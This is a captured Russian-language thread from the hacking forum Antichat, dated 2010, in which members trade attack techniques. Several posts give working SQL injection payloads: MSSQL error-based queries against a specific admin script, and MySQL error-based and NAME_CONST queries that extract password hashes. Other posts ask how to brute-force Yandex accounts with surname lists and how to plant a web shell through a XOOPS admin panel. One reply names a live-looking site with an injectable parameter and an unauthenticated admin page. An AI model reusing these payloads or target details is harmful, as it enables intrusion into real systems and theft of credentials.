Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.05.2010, 02:11
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
|
|
|
14.05.2010, 02:13
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641
Репутация:
8
|
|
Сообщение от BrainDeaD
на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--
 ((
|
|
|
|
14.05.2010, 04:13
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от br1tva
Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--
=convert(int,(SELECT TOP 1 cast(name as nvarchar(4000))%2bchar(126) FROM (database)..sysobjects WHERE xtype=char(85)))--
|
|
|
|
14.05.2010, 13:51
|
|
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738
Репутация:
2
|
|
Народ, есть ли у кого база фамилий в женском склонении для брута? (Девичья фамилия матери)
Возможно ли побрутить яндекс этими фамилиями?
|
|
|
|
14.05.2010, 15:59
|
|
Постоянный
Регистрация: 22.11.2008
Сообщений: 344
Провел на форуме:
3863128
Репутация:
570
|
|
Есть админка XOOPS cms. как залить шелл?
На форуме ничего путевого не нашел.
|
|
|
|
14.05.2010, 16:46
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
парочка общих вопросов накопилась 
1. по mysql:
1a.
Код:
+or(1,1)=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)
как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?
1b.
Код:
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a
как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?
2. если есть код вида
Код:
$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)
и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?
Последний раз редактировалось DrakonHaSh; 14.05.2010 в 16:50..
|
|
|
|
14.05.2010, 17:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
1. как обойти авторизацию на папку?
Например тут: http://cmj.com/admin
2. Как найти полный путь к корню сайта на сервере?
Последний раз редактировалось jecka3000; 14.05.2010 в 17:26..
|
|
|
|
14.05.2010, 17:36
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от jecka3000
1. как обойти авторизацию на папку?
Например тут: http://cmj.com/admin
2. Как найти полный путь к корню сайта на сервере?
1) Никак
2) Найти ошибку с раскрытием пути.
http://prod1.cmj.com/articles/display_article.php?id=179548196+order+by+1--
Вот скуля раскручивай может чего нарулишь там.
Угар)) там даже раскручивать не надо ))
http://prod1.cmj.com/admin/
Вход в админку без авторизации))
Последний раз редактировалось kfor; 14.05.2010 в 17:42..
|
|
|
|
14.05.2010, 18:25
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
DrakonHaSh
https://forum.antichat.ru/thread119047.html
и П.С https://forum.antichat.ru/thread104591.html
|
|
|
|
14.05.2010, 20:30
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
Сообщение от [Feldmarschall]
DrakonHaSh
https://forum.antichat.ru/thread119047.html
и П.С https://forum.antichat.ru/thread104591.html
пользоваться и применять я это умею вникни, пожалуйста, в то, что я спрашиваю:
1. по mysql:
1a.
Код:
+or(1,1)=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)
как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?
1b.
Код:
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a
как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?
2. если есть код вида
Код:
$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)
и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
Похожие темы
Линейный вид
